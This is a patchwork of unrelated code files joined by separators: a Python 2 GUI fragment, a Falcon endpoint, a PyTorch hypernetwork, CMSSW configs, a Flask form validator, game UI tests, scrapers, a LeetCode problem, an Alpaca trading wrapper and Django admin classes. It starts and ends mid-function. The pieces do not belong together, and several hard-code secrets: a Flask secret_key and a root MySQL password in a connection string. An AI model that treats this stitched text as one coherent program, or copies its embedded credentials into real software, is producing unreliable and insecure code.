            self.act[-1]. name = str([i,y])  # name encodes the grid coordinate
            self.act[-1]. re_rect()
            self.act[-1].ms_cl1 = self.close_block  # click handler
            self.rt.act.append(self.act[-1])
    def close_block(self):
        """Click handler: print the name of the most recently clicked widget."""
        print self.rt.ms_app[-1].name
if __name__=='__main__':
    ""
    # Smoke test: build a 1600x800 window, fill it with blocks and run the
    # event loop; the time.time() prints bracket each phase for rough timing.
    print time.time()
    a = pgwidth.width()
    a.size = (1600,800)
    a.ima_papier=[250,250,250]  # near-white background colour
    a.width()
    bock0 = rect(a.root,a,"block.jpg")
    bock0.re_rect()
    print time.time()
    a.mainloop()
    print time.time()
|
import json
import os
import falcon
class StudentReportJSON:
    """Falcon resource serving the pre-generated student report JSON file."""

    def __init__(self):
        # Report file lives at ../../media/student_report.json relative to
        # this module.
        self._json_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../..', 'media',
                                       'student_report.json')

    def on_get(self, req, resp):
        """Return the report file verbatim.

        Bug fix: the payload is JSON, so advertise falcon.MEDIA_JSON instead
        of MEDIA_HTML.
        """
        with open(self._json_path) as f:
            resp.body = f.read()
        resp.status = falcon.HTTP_200
        resp.content_type = falcon.MEDIA_JSON

    def on_post(self, req, resp):
        """POST is not supported on this resource (405 Method Not Allowed)."""
        resp.status = falcon.HTTP_405
        resp.content_type = falcon.MEDIA_JSON
|
import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class SplitInputParameterNet(nn.Module):
    """Surrogate net whose main-network weights are predicted from parameters."""

    def __init__(self,
                 input_dim,
                 nparams,
                 output_dim,
                 parameterNunits=None,
                 internalNunits=None):
        '''
        Defines a network that splits inputs x into physical system inputs and
        parameters. Inputs are propagated through a "main" neural network whose
        weights are predicted by an auxiliary network fed with the parameters.

        Args:
            input_dim (int): dimension of physical system inputs
            nparams (int): dimension of all physical system parameters combined
            output_dim (int): dimension of physical system outputs
            parameterNunits (list of int): hidden units per layer of the
                auxiliary parameter network (default [100, 100, 100])
            internalNunits (list of int): hidden units per layer of the main
                network that propagates physical system inputs
                (default [10, 10, 10])
        '''
        super(SplitInputParameterNet, self).__init__()
        # Avoid mutable default arguments (previously shared list literals).
        if parameterNunits is None:
            parameterNunits = [100, 100, 100]
        if internalNunits is None:
            internalNunits = [10, 10, 10]
        self.input_dim = input_dim
        self.nparams = nparams
        self.output_dim = output_dim
        self.internalNunits = internalNunits
        self.inputNlayers = len(internalNunits)

        # Total number of weights + biases the parameter net must emit: one
        # matrix and one bias vector per internal layer transition.
        nparameters = 0
        for i in range(len(internalNunits) - 1):
            nparameters += internalNunits[i] * internalNunits[i + 1]
            nparameters += internalNunits[i + 1]

        # parameterNet maps the nparams physical parameters to that flat vector.
        self.parameterNet = torch.nn.Sequential()
        self.parameterNet.add_module("fcIn", torch.nn.Linear(nparams, parameterNunits[0]))
        for i in range(len(parameterNunits)):
            if i < len(parameterNunits) - 1:
                self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
                self.parameterNet.add_module(f"fc{i}", torch.nn.Linear(parameterNunits[i], parameterNunits[i + 1]))
            else:
                self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
                self.parameterNet.add_module(f"fcOut", torch.nn.Linear(parameterNunits[i], nparameters))

        # Fully connected layers adapting input/output dims to the internal width.
        self.fcIn = nn.Linear(input_dim, internalNunits[0])
        self.fcOut = nn.Linear(internalNunits[-1], output_dim)

    def forward(self, x):
        """Columns [:input_dim] of *x* are system inputs; the rest are parameters."""
        batch_size, _ = x.shape
        inputs = x[:, :self.input_dim]
        parameters = x[:, self.input_dim:]

        # AUXILIARY PARAMETER NETWORK: predict the main network's weights.
        parameters = self.parameterNet(parameters)

        # Slice per-layer weight matrices, then biases, out of the flat vector.
        # (The original pre-allocated zero tensors here that were immediately
        # overwritten; those dead allocations are removed.)
        inputNetMatrices = []
        inputNetBiases = []
        index = 0
        for i in range(len(self.internalNunits) - 1):
            size = self.internalNunits[i] * self.internalNunits[i + 1]
            inputNetMatrices.append(parameters[:, index:index + size].reshape(
                batch_size, self.internalNunits[i + 1], self.internalNunits[i]))
            index += size
        for i in range(len(self.internalNunits) - 1):
            size = self.internalNunits[i + 1]
            inputNetBiases.append(
                parameters[:, index:index + size].reshape(batch_size, size, 1))
            index += size

        # MAIN INPUT NETWORK: batched affine layers with ReLU activations.
        inputs = self.fcIn(inputs).unsqueeze(-1)
        for weight, bias in zip(inputNetMatrices, inputNetBiases):
            inputs = torch.relu(torch.bmm(weight, inputs) + bias)
        return self.fcOut(inputs.squeeze(-1))
class SplitInputParameterObjective(object):
    """Optuna objective wrapping SplitInputParameterNet training.

    A class is used to smuggle the loaders/dimensions into the objective.
    """

    def __init__(self, train_loader, test_loader, dt_path, input_dim, nparams, output_dim, **modelargs):
        self.modelargs = modelargs
        self.dt_path = dt_path
        self.train_loader = train_loader
        self.test_loader = test_loader
        self.input_dim = input_dim
        self.nparams = nparams
        self.output_dim = output_dim

    def __call__(self, trial):
        """Sample hyperparameters, train one model and return its score."""
        lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)

        # One width suggestion per sampled layer; the trial parameter names
        # ("Nunits1".."Nunits5", "iNunits1".."iNunits5") match the original
        # if/elif ladder so existing studies stay compatible.
        parameterNlayers = trial.suggest_categorical("parameterNlayers", [1, 2, 3, 4, 5])
        parameterNunits = [
            int(trial.suggest_loguniform(f"Nunits{i + 1}", 50, 1000))
            for i in range(parameterNlayers)
        ]

        internalNlayers = trial.suggest_categorical("internalNlayers", [1, 2, 3, 4, 5])
        # Bug fix: the original sized this list from parameterNlayers, so the
        # sampled internalNlayers value was silently ignored.
        internalNunits = [
            int(trial.suggest_loguniform(f"iNunits{i + 1}", 10, 100))
            for i in range(internalNlayers)
        ]

        name = f"{self.dt_path}_v{trial.number}"  # create name with trial index
        value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
            self.train_loader,
            self.test_loader,
            name,
            self.input_dim,
            self.nparams,
            self.output_dim,
            Model = SplitInputParameterNet,
            parameterNunits = parameterNunits,
            internalNunits = internalNunits,
            lr = lr,
            **self.modelargs)
        trial.set_user_attr('model_path', model_path)  # save the model path string in NAS study
        return value
import FWCore.ParameterSet.Config as cms
# Minimal CMSSW test job: an empty source feeding one lumi-watching producer.
process = cms.Process("Test")
process.source = cms.Source("EmptySource")
# NOTE(review): two streams with a one:: (non-concurrent) producer — presumably
# to exercise its serialization; confirm against the test's intent.
process.options.numberOfStreams = 2
process.a = cms.EDProducer("edmtest::one::WatchLumiBlocksProducer", transitions = cms.int32(0))
process.p = cms.Path(process.a)
|
from os import listdir
from os.path import isfile, join, abspath
# Generate README.md with one embedded preview link per image in ./images.
image_path = abspath('./images')
# Fix: sort the listing — os.listdir order is filesystem-dependent, which made
# the generated README nondeterministic across runs/machines.
onlyfiles = sorted(f for f in listdir(image_path) if isfile(join(image_path, f)))
readme = '''# awesome-video-chat-backgrounds
Just in case you're at home on a video call and you haven't had time to tidy up your REAL background, here are some awesome backgrounds to help you get through your next video chat.
## Contributing
* Please submit pull requests to add additional photos/images to this collection!
* Images should be minimum of 1080 (width) x 550 (height) pixels
## Image List
'''
for file in onlyfiles:
    # Title derived from the filename: underscores -> spaces, Title Case.
    title = file.split('.')[0].replace('_',' ').title()
    readme += '<a href="./images/{}" title="{}"> <img align="center" src="./images/{}" width="540px"/></a>\n'.format(file, title, file)
with open('README.md','w+') as f:
    f.write(readme)
|
from enum import Enum
# Kinds of hardware sensors; the integer values are the stored codes.
Sensortype = Enum("Sensortype", [
    ("Door", 0),
    ("Infrared", 1),
    ("Water", 2),
    ("Smoke", 3),
    ("Temperature", 4),
])
# Kinds of records, mirroring the sensor kinds one-to-one.
Recordtype = Enum("Recordtype", [
    ("Door", 0),
    ("Infrared", 1),
    ("Water", 2),
    ("Smoke", 3),
    ("Temperature", 4),
])
class Onoff:
    """On/off constants kept as plain ints (not an Enum), so they compare to 0/1."""
    Off = 0
    On = 1
class Status:
    """Plain integer result codes: 0 = success, 1 = failure."""
    Success = 0
    Fail = 1
from flask import Flask, render_template, request, redirect, session, flash
import re
# Rough email shape check: local-part @ domain . letters-only TLD.
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = '&@DHDJ^^(%^(^^^G@#$@#!@EDQADSG'  # NOTE(review): hard-coded secret; load from env/config for production
@app.route('/')
def index():
    """Render the registration form page."""
    return render_template("index.html")
# check all inputs for length > 0 and password > 8 characters
def validLength(form):
    """Return True when every field is non-empty and the password exceeds 8 chars."""
    required_nonempty = ('email', 'fname', 'lname', 'confirm_pw')
    if any(len(form[field]) < 1 for field in required_nonempty):
        return False
    return len(form['pw']) > 8
# no numbers in name fields
def validNameFields(form):
    """Return True when both name fields are purely alphabetic (no digits/symbols)."""
    return form['fname'].isalpha() and form['lname'].isalpha()
# check for matching passwords
def matchingPasswordInputs(form):
    """Return True when the password and its confirmation are identical."""
    return form['pw'] == form['confirm_pw']
@app.route('/process', methods=['POST'])
def process():
    """Validate the registration form; flash the first failing rule, then redirect home."""
    print(request.form)  # NOTE(review): debug print; consider removing for production
    # Checks run in order; only the first failure's message is flashed.
    if not validLength(request.form):
        flash('All input fields required and Password must be more than 8 characters!')
        return redirect('/')
    elif not validNameFields(request.form):
        flash('No numbers allowed in name inputs!')
        return redirect('/')
    elif not EMAIL_REGEX.match(request.form['email']):
        flash('Invalid email address format!')
        return redirect('/')
    elif not matchingPasswordInputs(request.form):
        flash('Passwords do not match!')
        return redirect('/')
    flash("Thanks for submitting your info!")
    return redirect('/')
app.run(debug=True) |
"""
伙伴模块
"""
# -*- encoding=utf8 -*-
__author__ = "Lee.li"
from airtest.core.api import *
from multi_processframe.ProjectTools import common, common, common
def monster(start, devices):
    """
    Companion (伙伴) screen UI smoke test.
    :param start: run-start timestamp used when naming failure screenshots
    :param devices: device address to connect to
    :return: name of the poco("Duck") node
    """
    poco = common.deviceconnect(devices)
    check_menu("SysDMonster", poco)  # open the companion screen
    if poco("BookBg").exists():  # companion screen is visible
        with poco.freeze() as freeze_poco:
            # Check that every expected UI element is present.
            if freeze_poco("item0").child("selected").exists() and \
                    freeze_poco("item1").child("selected").exists() and \
                    freeze_poco("item2").child("selected").exists() and \
                    freeze_poco("StarCount").exists() and \
                    freeze_poco("Stars").exists() and \
                    freeze_poco("BtnReward").exists() and \
                    freeze_poco("BtnAttrTotal").exists() and \
                    freeze_poco("WrapContent").exists() and \
                    freeze_poco("MonsterpreferenceDlg(Clone)").child("Help").exists() and \
                    freeze_poco("Icons").offspring("item0").exists() and \
                    freeze_poco("Icons").offspring("item1").exists() and \
                    freeze_poco("Select").exists() and \
                    freeze_poco("ActiveBtn").exists():
                common.printgreen("伙伴界面UI元素显示正常")
            else:
                common.printred("伙伴界面UI元素显示异常,详情见截图")
                common.get_screen_shot(start, time.time(), devices, "伙伴界面UI元素显示异常")
            # Click through every button once; any failure is screenshotted.
            try:
                freeze_poco("item1").child("selected").click()
                freeze_poco("item2").child("selected").click()
                freeze_poco("MonsterpreferenceDlg(Clone)").child("Help").click()
                poco("Btn").click()
                freeze_poco("BtnReward").click()
                poco("PointRewardFrame").offspring("Close").click()
                freeze_poco("BtnAttrTotal").click()
                freeze_poco("BtnAttrTotal").click()
                freeze_poco("ActiveBtn").click()
                common.printgreen("伙伴界面按钮点击正常")
            except Exception as e:
                common.printred("伙伴界面按钮点击流程异常")
                common.printred(e)
                common.get_screen_shot(start, time.time(), devices, "伙伴界面按钮点击流程异常")
            try:
                print("测试A级伙伴的数量")  # count A-grade companions per group
                poco("item1").child("selected").click()
                for i in range(len(poco("WrapContent").child())):
                    PetGroup = "PetGroup" + str(i)
                    poco(PetGroup).click()
                    count = len(poco("MonsterpreferenceDlg(Clone)").child("ItemListPanel").child("Bg1").child("Icons").offspring("Item"))
                    # BUG FIX: fetch the group name before branching — the
                    # original only assigned it in the success branch, so the
                    # failure branch raised NameError on the first mismatch.
                    uiname = poco(PetGroup).child("Name").get_text()
                    if count == 4:
                        common.printgreen(f"{uiname}的伙伴一共有4个")
                    else:
                        common.printred(f"{uiname}的伙伴少了,只出现了{count}个")
                        common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
                print("测试B级伙伴的数量")  # count B-grade companions per group
                poco("item2").child("selected").click()
                for i in range(len(poco("WrapContent").child())):
                    PetGroup = "PetGroup" + str(i)
                    poco(PetGroup).click()
                    count = len(poco("MonsterpreferenceDlg(Clone)").child("ItemListPanel").child("Bg1").child("Icons").offspring("Item"))
                    uiname = poco(PetGroup).child("Name").get_text()
                    if count == 3:
                        # BUG FIX: this branch checks for 3 but the original
                        # message claimed 4 ("一共有4个").
                        common.printgreen(f"{uiname}的伙伴一共有3个")
                    else:
                        common.printred(f"{uiname}的伙伴少了,只出现了{count}个")
                        common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
            except Exception as e:
                common.printred("遍历伙伴数量异常,详情见截图")
                common.printred(e)
                common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
    else:
        common.printred("伙伴界面报错,详情见截图")
        common.get_screen_shot(start, time.time(), devices, "伙伴界面报错")
    poco("Close").click()
    return poco("Duck").get_name()  # return value: poco("Duck").get_name()
def check_menu(sysmenu, poco):
    """Click the *sysmenu* entry, expanding the side menu first when the
    entry sits off-screen (x position > 0.88)."""
    if poco(sysmenu).get_position()[0] > 0.88:
        # Entry is outside the visible area: open the menu and let it settle.
        poco("MenuSwitchBtn").click()
        time.sleep(1)
    poco(sysmenu).click()
# devices = "127.0.0.1:62001"
# monster(devices) |
"""
# -*- coding: utf-8 -*-
# 写代码是热爱,写到世界充满爱!
# @Author:AI悦创 @DateTime :2019/10/1 13:13 @Function :数据库连接 Development_tool :PyCharm
# code is far away from bugs with the god animal protecting
I love animals. They taste delicious.
┏┓ ┏┓
┏┛┻━━━┛┻┓
┃ ☃ ┃
┃ ┳┛ ┗┳ ┃
┃ ┻ ┃
┗━┓ ┏━┛
┃ ┗━━━┓
┃ 神兽保佑 ┣┓
┃ 永无BUG! ┏┛
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
"""
from sqlalchemy import create_engine
# SQLAlchemy engine for the local MySQL `test` database.
# NOTE: no space inside "mysql+pymysql"; replace 123456 with your root password.
engine = create_engine(
    "mysql+pymysql://root:123456@127.0.0.1:3306/test",
    # "mysql + pymysql://root:root@localhost/test",
    max_overflow=5,  # extra connections allowed beyond pool_size
    pool_size=10,    # connection pool size
    echo=True,       # emit SQL debug logging
)
# Backward-compatible alias: the original bound this to the misspelled
# name `ngine`, which other modules may already import.
ngine = engine
from lxml import html
import requests
# Scrape the speechcon reference page and list the title of every <audio> sample.
domain = 'https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/speechcon-reference'
# A timeout keeps the script from hanging forever on network problems.
page = requests.get(domain, timeout=30)
tree = html.fromstring(page.content)
# Titles of all <audio> elements (fixes the `responce` typo).
response = tree.xpath('//audio/@title')
print(response)
|
from django.conf.urls import url
from .views import (
SubjectListAPIView,
SubjectCreateAPIView,
SubjectDetailAPIView
)
# Subject API routes:
#   ''        -> list view
#   'create/' -> create view
#   '<id>/'   -> detail view for a single subject (numeric id)
urlpatterns = [
    url(r'^$', SubjectListAPIView.as_view(), name='list'),
    url(r'^create/$', SubjectCreateAPIView.as_view(), name='create'),
    url(r'^(?P<id>\d+)/$', SubjectDetailAPIView.as_view(), name='detail'),
]
|
# -*- coding: utf-8 -*-
# @File : get_info_jd.py
# @Author: KingJX
# @Date : 2019/1/19
""""""
import requests
import json
from lxml import etree
def get_url_page(url, timeout=10):
    """
    Fetch *url* and return the body decoded as GBK.

    :param url: page address to fetch
    :param timeout: seconds before the request is abandoned (new parameter;
        the default keeps existing callers working — the original could hang
        forever)
    :return: decoded page text on HTTP 200, otherwise None
    """
    headers = {
        # Desktop UA so the site serves the regular page.
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"
    }
    response = requests.get(url, headers=headers, timeout=timeout)
    if response.status_code == 200:
        # JD pages are GBK-encoded.
        return response.content.decode('GBK')
    return None
def parse_page():
    """Fetch a sample JD item page and return its positive-rating
    ("percent-con") div nodes.

    (Removed the unused local `info = {}` from the original.)
    """
    url = 'https://item.jd.com/3290987.html'
    html = get_url_page(url)
    print(html)
    etree_html = etree.HTML(html)
    # Container holding the positive-review percentage.
    comm = etree_html.xpath('.//div[@class="percent-con"]')
    return comm
def get_name_price(url_1):
    """Build the recommendation (JSONP) URL for an item page and return a
    dict with the item's name and price."""
    # The SKU is the numeric part of the item URL, e.g. .../3290987.html -> 3290987
    sku = url_1.split('/')[-1].split('.')[0]
    url = (
        'https://c.3.cn/recommend?callback=handleComboCallback&methods=accessories&p=103003&sku=%s' % sku
        + '&cat=670%2C671%2C672&lid=1&uuid=572822970&pin=&ck=pin%2CipLocation%2Catw%2Caview&lim=5&cuuid=572822970&csid=122270672.7.572822970%7C27.1547907196&_=1547910477315'
    )
    html = get_url_page(url)
    # Strip the JSONP wrapper "handleComboCallback( ... )" and parse the payload.
    json_goods = json.loads(html.split('handleComboCallback(')[1][:-1])
    data = json_goods['accessories']['data']
    return {'name': data['wName'], 'price': data['wMaprice']}
def main():
    """Prompt for an item URL and print the resolved name and price."""
    goods_info = get_name_price(input('请输入要解析的商品地址:'))
    print("商品名称为:", goods_info['name'])
    print('商品价格为:', goods_info['price'])
if __name__ == '__main__':
main()
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
from tensorflow.python.ops import numpy_ops as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
class UtilsTest(jtu.JaxTestCase):
  """Tests for `utils.is_on_cpu` across dtypes, jit, and backends."""

  def testIsOnCPU(self):
    for dtype in [np.float32, np.float64]:
      with self.subTest(dtype=dtype):
        def x():
          # Device-default random array (lives wherever the backend puts it).
          return random.normal(random.PRNGKey(1), (2, 3), dtype)
        def x_cpu():
          # device_get pulls the array to host memory.
          return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
        x_jit = jit(x)
        # x_cpu_jit = jit(x_cpu)
        x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
        # Host-fetched and cpu-backend-jitted values must report as on-CPU.
        self.assertTrue(utils.is_on_cpu(x_cpu()))
        # TODO(mattjj): re-enable this when device_put under jit works
        # self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
        self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
        # Default-placement values are on CPU iff the default backend is CPU.
        if xla_bridge.get_backend().platform == 'cpu':
          self.assertTrue(utils.is_on_cpu(x()))
          self.assertTrue(utils.is_on_cpu(x_jit()))
        else:
          self.assertFalse(utils.is_on_cpu(x()))
          self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
absltest.main()
|
1391. Check if There is a Valid Path in a Grid
Given a m x n grid. Each cell of the grid represents a street. The street of grid[i][j] can be:
1 which means a street connecting the left cell and the right cell.
2 which means a street connecting the upper cell and the lower cell.
3 which means a street connecting the left cell and the lower cell.
4 which means a street connecting the right cell and the lower cell.
5 which means a street connecting the left cell and the upper cell.
6 which means a street connecting the right cell and the upper cell.
You will initially start at the street of the upper-left cell (0,0). A valid path in the grid is a path which starts from the upper left cell (0,0) and ends at the bottom-right cell (m - 1, n - 1). The path should only follow the streets.
Notice that you are not allowed to change any street.
Return true if there is a valid path in the grid or false otherwise.
Example 1:
Input: grid = [[2,4,3],[6,5,2]]
Output: true
Explanation: As shown you can start at cell (0, 0) and visit all the cells of the grid to reach (m - 1, n - 1).
Example 2:
Input: grid = [[1,2,1],[1,2,1]]
Output: false
Explanation: As shown, the street at cell (0, 0) is not connected to any street in any other cell, so you will get stuck at cell (0, 0).
Input: grid = [[1,1,2]]
Output: false
Explanation: You will get stuck at cell (0, 1) and you cannot reach cell (0, 2).
Input: grid = [[1,1,1,1,1,1,3]]
Output: true
Input: grid = [[2],[2],[2],[2],[2],[2],[6]]
Output: true
Constraints:
m == grid.length
n == grid[i].length
1 <= m, n <= 300
1 <= grid[i][j] <= 6
|
from alpaca_trade_api.rest import REST,TimeFrame
import pandas as pd
class Mercado:
    def __init__(self, agent_hodings: dict, agent_cash: dict, api_key: str, secret_key: str, live: bool) -> None:
        """
        Market/broker wrapper around the Alpaca trading API.
        ...

        Attributes
        ----------
        api_key : str
            Alpaca API key id.
        secret_key : str
            Alpaca API secret.
        agent_holdings : dict
            Holdings per agent.
        agent_cash : dict
            Cash per agent.
        live : bool
            Define is the bot is going to trade on real time or simulation(ACTIVATE IT WHEN BACKTESTING).
        """
        self.api_key = api_key
        self.secret_key = secret_key
        self.agent_holdings = agent_hodings
        self.agent_cash = agent_cash
        self.live = live
        # SECURITY FIX: use the caller-supplied credentials. The original
        # hard-coded a real-looking key pair here, leaking secrets in source
        # control and ignoring the api_key/secret_key parameters entirely.
        self.api_account = REST(api_key, secret_key)

    def fetch_stock_data(self, init_date: str, end_date: str, tickers: list, period=1.0) -> pd.DataFrame:
        """
        Fetches data from ALPACA MARKETS
        NOTE : period is meaused in seconds,so:
        1 Minute = 60 Seconds
        1 Day = 3600 Seconds
        1 Month = 216,000 Seconds
        1 Year = 12,960,000 Seconds
        Parameters
        ----------
        init_date: str
            Initial Date of fetching data.
        end_date: str
            Final Date of fectching data.
        tickers: list
            List of tickers names.
        period: float
            Time-lapse of fetch.
        Returns
        -------
        `pd.DataFrame`
            7 columns: A date, open, high, low, close, volume and tick symbol
            for the specified stock ticker
        """
        # Download each ticker's daily bars and stack them into one frame.
        # BUG FIX: the original read undefined attributes (self.ticker_list,
        # self.api, self.start_date, self.end_date) — it now uses its own
        # parameters and the REST client created in __init__.
        frames = []
        for tic in tickers:
            temp_df = self.api_account.get_bars(tic, TimeFrame.Day, init_date, end_date, adjustment='raw').df
            temp_df["tic"] = tic
            frames.append(temp_df)
        # pd.concat replaces the deprecated DataFrame.append.
        data_df = pd.concat(frames) if frames else pd.DataFrame()
        # reset the index, we want to use numbers as index instead of dates
        data_df = data_df.reset_index()
        try:
            # convert the column names to standardized names
            data_df.columns = [
                "date",
                "open",
                "high",
                "low",
                "close",
                "volume",
                "trade_count",
                "vwap",
                'tic'
            ]
            # use adjusted close price instead of close price
            #data_df["close"] = data_df["adjcp"]
            # drop the columns we do not standardize on (keyword form replaces
            # the deprecated positional axis argument)
            data_df = data_df.drop(columns=["trade_count", "vwap"])
        except NotImplementedError:
            print("the features are not supported currently")
        # create day of the week column (monday = 0)
        data_df["day"] = data_df["date"].dt.dayofweek
        # convert date to standard string format, easy to filter
        data_df["date"] = data_df.date.apply(lambda x: x.strftime("%Y-%m-%d"))
        # drop missing data
        data_df = data_df.dropna()
        data_df = data_df.reset_index(drop=True)
        print("Shape of DataFrame: ", data_df.shape)
        # print("Display DataFrame: ", data_df.head())
        data_df = data_df.sort_values(by=['date', 'tic']).reset_index(drop=True)
        return data_df

    def trade(self, tickers: dict) -> None:
        # Placeholder: order placement not implemented yet.
        pass

    def fetch_real_time(self, tickers: list) -> None:
        # Placeholder: streaming quotes not implemented yet.
        pass

    def _check_status(self) -> None:
        # Placeholder: account/connection health check not implemented yet.
        pass

    def stop(self) -> None:
        # Placeholder: shutdown hook not implemented yet.
        pass
|
from TinhToan import giaTriTheoKhuc
from MayInNhanh import *
# Trial profit calculation
daySoLuong = [1,50,100,150,200]
dayLoiNhuan = [50,60,70,80,90]
#print(giaTriTheoKhuc(daySoLuong, dayLoiNhuan, 52))
#1). Base data 01, quantity starting at 1
daySoLuongCB01 = [1,50,100,150,200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950]
dayLoiNhuanCB01 = [30,65,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68]
#2). Profit series to compete against (flat 50)
day_so_luong_cb2 = [1, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750, 800, 850, 900, 950]
day_loi_nhuan_cb2 = [50, 50, 50 , 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50]
'''Cạnh tranh nên xem sao'''
#2). Base data for 1000 to 10000 pages (max daily capacity of one machine)
#daySoLuongCB02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
#dayLoiNhuanCB02 = [68,63, 62, 61, 60, 68, 69, 67, 66, 65, 64, 63, 62, 61, 60, 58, 56, 54, 52, 50]
'''Mức này đang lãi như Kprint'''
## trial run on 2017-08-10
"""Tính hình thị trường có thể giảm"""
daySoLuongCB02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
dayLoiNhuanCB02 = [68,65, 63, 61, 60, 59, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45]
# Input data for the calculation based on current information
dayTrang01 = [50,100,150,200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950,999]
dayTrang02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
# NOTE(review): day_so_luong_cb2 is passed twice here — the second argument
# looks like it should be day_loi_nhuan_cb2; confirm against MayInDigi's signature.
mayin01 = MayInDigi(450, 760000, 0.08, day_so_luong_cb2, day_so_luong_cb2, 1200) # speed: 1200 A4 pages/hour
ty_le_sales_khach_cuoi = 0 # trial adjustment (end-customer sales rate)
giaIn01 = GiaInTheoMayToner(mayin01, 0, ty_le_sales_khach_cuoi)
# Calculation 01:
# NOTE(review): the loop bound uses len(dayTrang02) but indexes dayTrang01 —
# both happen to have 20 entries, but confirm which series is intended.
for i in range(0,len(dayTrang02)):
    giaIn01.SoTrangA4 = dayTrang01[i]
    #print (round(giaIn01.GiaSales())),
    # print('SL: {0}, {1}, {2} LN: {3}'.format(giaIn01.SoTrangA4, round(giaIn01.GiaSales()),\
    #                                          round(giaIn01.GiaTrangTB()), giaTriTheoKhuc(daySoLuongCB02, dayLoiNhuanCB02,giaIn01.SoTrangA4)))
    print('SL: {0}, {1}, {2} LN: {3}'.format(giaIn01.SoTrangA4, round(giaIn01.gia_sales_them()), \
          round(giaIn01.gia_TB_trang_sales()),
          giaTriTheoKhuc(day_so_luong_cb2, day_loi_nhuan_cb2, \
          giaIn01.SoTrangA4)))
#print('{0}'.format(giaTriTheoKhuc(daySoLuongCB01, dayLoiNhuanCB01,50)))
from django.contrib import admin
from django.utils.safestring import mark_safe
from Profile.models import PostWall, Reviews, LikePost
from mptt.admin import MPTTModelAdmin
@admin.register(PostWall)
class PostWallAdmin(admin.ModelAdmin):
    """Admin list for wall posts with an inline image preview column."""
    list_display = ('id', 'des', 'user', 'get_image')

    def get_image(self, obj):
        """Render a small <img> preview, or None when the post has no image."""
        if obj.image:
            # BUG FIX: the original emitted an unterminated `<img ...` tag with
            # an unquoted src attribute; the URL is now quoted and the tag closed.
            return mark_safe(
                f'<img src="{obj.image.url}" width="100" height="60" style="margin-left: 0px;">'
            )
        else:
            return None

    get_image.short_description = "Изображение"
    get_image.allow_tags = True
@admin.register(Reviews)
class ReviewsAdmin(admin.ModelAdmin):
    """Admin list for reviews, showing the parent review when one exists."""
    list_display = ('text', 'user', 'get_parent')

    def get_parent(self, obj):
        # A falsy parent is reported explicitly as None.
        return obj.parent if obj.parent else None
admin.site.register(LikePost)
|
import FWCore.ParameterSet.Config as cms
# define all the changes for unganging ME1a
def unganged_me1a(process):
    """Apply every customisation needed to run with unganged ME1/a strips:
    geometry flags plus digitizer timing offsets."""
    ### CSC geometry customization:
    #from Configuration.StandardSequences.GeometryDB_cff import *
    # BUG FIX: dict.has_key() is Python-2-only and removed in Python 3;
    # the `in` operator is equivalent and works everywhere.
    if 'idealForDigiCSCGeometry' not in process.es_producers_():
        process.load('Geometry.CSCGeometryBuilder.cscGeometryDB_cfi')
        process.load('Geometry.CSCGeometryBuilder.idealForDigiCscGeometryDB_cff')
    process.CSCGeometryESModule.useGangedStripsInME1a = False
    process.idealForDigiCSCGeometry.useGangedStripsInME1a = False
    ### Digitizer customization:
    if 'simMuonCSCDigis' not in process.producerNames():
        process.load('SimMuon.CSCDigitizer.muonCSCDigis_cfi')
    ## Make sure there's no bad chambers/channels
    #process.simMuonCSCDigis.strips.readBadChambers = True
    #process.simMuonCSCDigis.wires.readBadChannels = True
    #process.simMuonCSCDigis.digitizeBadChambers = True
    ## Customized timing offsets so that ALCTs and CLCTs times
    ## are centered in signal BX. The offsets below were tuned for the case
    ## of 3 layer pretriggering and median stub timing algorithm.
    process.simMuonCSCDigis.strips.bunchTimingOffsets = cms.vdouble(0.0,
        37.53, 37.66, 55.4, 48.2, 54.45, 53.78, 53.38, 54.12, 51.98, 51.28)
    process.simMuonCSCDigis.wires.bunchTimingOffsets = cms.vdouble(0.0,
        22.88, 22.55, 29.28, 30.0, 30.0, 30.5, 31.0, 29.5, 29.1, 29.88)
    #done
    return process
# CSC geometry customization:
def unganged_me1a_geometry(process):
    """Disable ganged ME1/a strips in both CSC geometry producers."""
